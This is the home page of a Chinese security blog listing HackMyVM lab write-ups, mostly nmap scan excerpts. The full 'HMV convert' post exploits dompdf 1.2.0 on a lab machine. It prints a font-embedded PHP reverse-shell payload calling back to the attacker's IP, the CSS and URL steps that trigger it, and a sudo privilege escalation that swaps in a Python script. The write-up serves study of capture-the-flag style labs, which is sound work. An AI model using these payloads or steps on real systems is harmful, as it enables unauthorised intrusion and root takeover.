<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ghostlitao.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="把生命浪费在美好的实物上">
<meta property="og:type" content="website">
<meta property="og:title" content="去找Todd">
<meta property="og:url" content="https://ghostlitao.gitee.io/index.html">
<meta property="og:site_name" content="去找Todd">
<meta property="og:description" content="把生命浪费在美好的实物上">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="Todd">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ghostlitao.gitee.io/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : true,
    isPost : false,
    lang   : 'zh-CN'
  };
</script>

  <title>去找Todd</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d988341c748563d16048e8e7dab0f384";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">去找Todd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Todd的博客</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content index posts-expand">
            
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/19/hmv-supra/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/19/hmv-supra/" class="post-title-link" itemprop="url">HMV Supra</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-19 08:40:57" itemprop="dateCreated datePublished" datetime="2024-04-19T08:40:57+08:00">2024-04-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-23 08:42:35" itemprop="dateModified" datetime="2024-04-23T08:42:35+08:00">2024-04-23</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p><a target="_blank" rel="noopener" href="https://hackmyvm.eu/machines/machine.php?vm=Supra">https://hackmyvm.eu/machines/machine.php?vm=Supra</a></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NAMP 扫描"></a>NAMP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.197</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"><span class="comment"># -sV Probe open ports to determine service/version info , # 识别服务/版本</span></span><br><span class="line"><span class="comment"># -T5 Set timing template (higher is faster) # 5是最快的了</span></span><br><span class="line"><span class="comment"># -Pn Treat all hosts as online -- skip host discovery # 不进行主机发现</span></span><br><span class="line"><span class="comment"># -p- Scan all ports # 扫描所有端口</span></span><br><span class="line"></span><br><span class="line">PORT     STATE SERVICE VERSION</span><br><span class="line">22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)</span><br><span class="line">80/tcp   open  http    Apache httpd 2.4.48 ((Debian))</span><br><span class="line">4000/tcp open  http    Node.js (Express middleware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/04/19/hmv-supra/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/18/hmv-convert/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/18/hmv-convert/" class="post-title-link" itemprop="url">HMV convert 靶机复盘</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-04-18 09:24:02 / 修改时间：13:21:03" itemprop="dateCreated datePublished" datetime="2024-04-18T09:24:02+08:00">2024-04-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NAMP 扫描"></a>NAMP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.190</span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"></span><br><span class="line">Host is up (0.022s latency).</span><br><span class="line">Not shown: 64756 closed tcp ports (conn-refused), 777 filtered tcp ports (no-response)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)</span><br><span class="line">80/tcp open  http    nginx 1.22.1</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>开了 80 和 22 ，先开着目录扫描：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gobuster <span class="built_in">dir</span> -u http://<span class="variable">$IP</span> -w /usr/share/wordlists/dirb/common.txt</span><br><span class="line"></span><br><span class="line">/index.php            (Status: 200) [Size: 1026]</span><br><span class="line">/upload               (Status: 301) [Size: 169] [--&gt; http://192.168.0.190/upload/]</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>看一眼首页是提供 HTML 到 PDF 的转换服务的。直接访问 <a target="_blank" rel="noopener" href="http://192.168.0.190/upload/">http://192.168.0.190/upload/</a> 是一个 403，不知道是不给列目录还是需要登陆验证。</p>
<h1 id="尝试入侵"><a href="#尝试入侵" class="headerlink" title="尝试入侵"></a>尝试入侵</h1><p>看着 HTML 转 PDF，尝试了下 <a href="http://www.baidu.com,报错：">http://www.baidu.com,报错：</a></p>
<pre><code><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fatal error: Uncaught <span class="built_in">RuntimeException</span>: <span class="built_in">Error</span> generating PDF: The PHP GD extension is required, but is not installed. in /<span class="keyword">var</span>/www/html/index.php:<span class="number">39</span> Stack trace: <span class="comment">#0 /var/www/html/index.php(61): PdfGenerator-&gt;generateFromHtml() #1 &#123;main&#125; thrown in /var/www/html/index.php on line 39</span></span><br></pre></td></tr></table></figure>
</code></pre>
<p>百度有图片，然后没有安装 GD 库。不过看到了 PdfGenerator-&gt;generateFromHtml() 和一些目录信息。暂时没什么用。去 github 上搜一下代码，看看有没有信息：<br><code>language:php  path:index.php  PdfGenerator-&gt;generateFromHtml()</code><br>搜不出来啥玩意。说明这个代码并不是那个开源项目里的。</p>
<p>再尝试下 <a target="_blank" rel="noopener" href="http://192.168.0.190/">http://192.168.0.190/</a> 发现返回了 pdf 版本的首页。<br>所以这个服务是正常工作的，只是没有 GD 库，不能生成图片。</p>
<p>此时群里的小伙伴提醒在 hacktricks 里面有一个 pdf 相关的知识点，去看了下，发现了一个有趣的东西：</p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf">https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf</a></p>
<p>因为转换服务需要读取网页内容，所以可能有两种情况：</p>
<ul>
<li>使用 wkhtmltopdf 之类的服务的时候，可能会执行 js 代码那么就是 xss，但是我们是靶机，xss 这种一般用处不大。</li>
<li>还有一种就是 SSRF，如果可以读取本地文件，那么就可以读取敏感文件。甚至可以利用做内网扫描。</li>
</ul>
<p>遗憾的是，试了很多 payload 似乎并没有触发，我基本上确认这个服务并不会执行 js 代码。</p>
<p>这个时候又有一个小伙伴丢出了一个 dompdf exploit。<br>原来是我太菜了，并不是我猜的 wkhtmltopdf。<br>其实我之前已经打开下载并打开过 pdf 文件了，strings 之后并没有这个内容。后来用 sublime 打开发现我遗漏了一行内容：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;&lt;</span><br><span class="line">/Producer (þÿ d o m p d f   1 . 2 . 0   +   C P D F)</span><br><span class="line">/CreationDate (D:20240418013744+00&#x27;00&#x27;)</span><br><span class="line">/ModDate (D:20240418013744+00&#x27;00&#x27;)</span><br></pre></td></tr></table></figure>

<p>似乎看到了是 dompdf 1.2.0，果然去 <a target="_blank" rel="noopener" href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> 搜索之后发现了 Dompdf 1.2.1 - Remote Code Execution (RCE) 。<br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/51270">https://www.exploit-db.com/exploits/51270</a><br>里面有利用脚本：<a target="_blank" rel="noopener" href="https://github.com/rvizx/CVE-2022-28368">https://github.com/rvizx/CVE-2022-28368</a><br>既然有脚本，剩下就是开搞</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/rvizx/CVE-2022-28368</span><br><span class="line"><span class="built_in">cd</span>  CVE-2022-28368</span><br><span class="line">python3 -m pip install -r requirements.txt</span><br><span class="line">python3 dompdf-rce.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure>

<p>一顿操作下来，傻眼了，并没有成功。仔细看了下利用代码，发现 RCE 利用的时候，dompdf 是直接有一个入口的，而靶场的入口是被目前看到的这个转换服务封装过的。</p>
<p>没办法，这个时候只能弄明白这个脚本是怎么工作的了。<br>又去一顿搜索。发现了一个 github 仓库 <a target="_blank" rel="noopener" href="https://github.com/positive-security/dompdf-rce">https://github.com/positive-security/dompdf-rce</a><br>里面有一个图写的非常清楚这个利用过程：<br><img src="https://github.com/positive-security/dompdf-rce/raw/main/exploit/overview.png" alt="dompdf-rce"></p>
<p>这个时候方案讲究比较清楚了，首先刚才的 python 脚本已经帮我生成了 css 和 php 文件，我只需多一个 html 引入这两个文件，然后开启 <code>python3 -m http.server 80</code>，然后访问这个 html 文件，就可以 触发了。</p>
<ol>
<li>先吧刚才生成的 css 和 php 文件放到一个目录下，改好里面的 IP 为本机和 python http 服务的端口。<code>python3 -m http.server 8000</code></li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/tools/CVE-2022-28368]</span><br><span class="line">└─$ <span class="built_in">cat</span> exploit.css</span><br><span class="line"></span><br><span class="line">@font-face &#123;</span><br><span class="line">    font-family:<span class="string">&#x27;exploitfont&#x27;</span>;</span><br><span class="line">    src:url(<span class="string">&#x27;http://192.168.0.30:8000/exploit_font.php&#x27;</span>);</span><br><span class="line">    font-weight:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">    font-style:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~/tools/CVE-2022-28368]</span><br><span class="line">└─$ <span class="built_in">cat</span> exploit_font.php</span><br><span class="line"></span><br><span class="line">� dum1�cmap</span><br><span class="line">           `�,glyf5sc��<span class="built_in">head</span>�Q6�6hhea��(<span class="variable">$hmtxD</span></span><br><span class="line">loca</span><br><span class="line">Tmaxp\ nameD�|8dum2�</span><br><span class="line">                     -��-����</span><br><span class="line">:83<span class="comment">#5:08��_&lt;�</span></span><br><span class="line">             @�8�&amp;۽</span><br><span class="line">:8L��</span><br><span class="line"></span><br><span class="line">:D</span><br><span class="line"></span><br><span class="line">6                               s</span><br><span class="line">&lt;?php <span class="built_in">exec</span>(<span class="string">&quot;/bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.0.30/1234 0&gt;&amp;1&#x27;&quot;</span>);?&gt;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>写一个 html 文件，里面引入这个 css 文件</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> <span class="attr">type</span>=<span class="string">&quot;text/css&quot;</span> <span class="attr">href</span>=<span class="string">&quot;http://IP:8000/explotit.css&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<ol start="3">
<li>去目标网页上输入这个 html 文件的地址，就可以看见请求：</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ python3 -m http.server 8000</span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /index.html HTTP/1.1&quot;</span> 200 -</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /exploit.css HTTP/1.1&quot;</span> 200 -</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /exploit_font.php HTTP/1.1&quot;</span> 200 -</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>此时恶意的 PHP 文件已经在靶机上生成了，接下来我们去算下路径的 cmd5 就可以在服务上触发了。</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 先准备一个反弹监听：</span></span><br><span class="line"></span><br><span class="line">pwncat-cs -l -p 1234</span><br><span class="line"></span><br><span class="line"><span class="comment"># 然后访问 http://192.168.0.30:8000/exploit_font.php 的cmd5 值：</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;http://192.168.0.30:8000/exploit_font.php&#x27;</span> | md5</span><br><span class="line">e47f95cc50e077ca3a5a0187668913a0</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>要访问的路径就是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.0.190/dompdf/lib/fonts/exploitfont_normal_e47f95cc50e077ca3a5a0187668913a0.php</span><br></pre></td></tr></table></figure>

<p>如果没有弹回成功，注意检查以上的各个步骤，还有一点是，这个 php 文件是在一个 font 文件尾部追加了一句话，所以如果你在 vim 下直接编辑，在字符集不正确的情况下，可能就不对了。<br>所以你可以选择不改 php 文件里的反弹地址或者端口。</p>
<ol start="5">
<li>然后就拿到了 eva 这个用户的 webshell</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">(remote) eva@convert:/var/www/html/dompdf/lib/fonts$ <span class="built_in">id</span></span><br><span class="line">uid=1000(eva) gid=1000(eva) <span class="built_in">groups</span>=1000(eva)</span><br><span class="line">(remote) eva@convert:/home/eva$ <span class="built_in">ls</span> -al</span><br><span class="line">total 36</span><br><span class="line">drwx------ 2 eva  eva  4096 Apr 16 05:35 .</span><br><span class="line">drwxr-xr-x 3 root root 4096 Feb 22 22:17 ..</span><br><span class="line">lrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -&gt; /dev/null</span><br><span class="line">-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout</span><br><span class="line">-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc</span><br><span class="line">-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile</span><br><span class="line">-rw------- 1 eva  eva  1392 Apr 16 05:35 .viminfo</span><br><span class="line">-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log</span><br><span class="line">-rw-r--r-- 1 eva  eva    33 Apr 16 05:35 pdfgen.py</span><br><span class="line">-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt</span><br></pre></td></tr></table></figure>

<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>先 <code>sudo -l </code> 看下结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Matching Defaults entries <span class="keyword">for</span> eva on convert:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty</span><br><span class="line"></span><br><span class="line">User eva may run the following commands on convert:</span><br><span class="line">    (ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *</span><br></pre></td></tr></table></figure>

<p>这里关键的部分就是 可以执行 pdfgen.py 的内容。经过大佬指点，自己的家目录，虽然没有修改权限，但是可以删除，于是：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">rm</span> pdfgen.py </span><br></pre></td></tr></table></figure>
<p>然后新建这个文件：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line">os.system(<span class="string">&#x27;/bin/bash&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>在执行这个文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/bin/python3 /home/eva/pdfgen.py 1</span><br><span class="line">root@convert:/home/eva<span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br></pre></td></tr></table></figure>

<p>就拿到了 root shell，然后就可以看到 &#x2F;root&#x2F;root.txt 了。</p>
<p>完结。</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/15/hmv-quick/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/15/hmv-quick/" class="post-title-link" itemprop="url">HMV Quick</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-15 08:51:13" itemprop="dateCreated datePublished" datetime="2024-04-15T08:51:13+08:00">2024-04-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-19 08:44:44" itemprop="dateModified" datetime="2024-04-19T08:44:44+08:00">2024-04-19</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NAMP 扫描"></a>NAMP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.189</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"><span class="comment"># -sV Probe open ports to determine service/version info , # 识别服务/版本</span></span><br><span class="line"><span class="comment"># -T5 Set timing template (higher is faster) # 5是最快的了</span></span><br><span class="line"><span class="comment"># -Pn Treat all hosts as online -- skip host discovery # 不进行主机发现</span></span><br><span class="line"><span class="comment"># -p- Scan all ports # 扫描所有端口</span></span><br><span class="line"></span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 09:48 HKT</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.0.189</span><br><span class="line">Host is up (0.020s latency).</span><br><span class="line">Not shown: 65534 closed tcp ports (conn-refused)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 20.18 seconds</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/04/15/hmv-quick/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/09/hmv-challenge-72/">

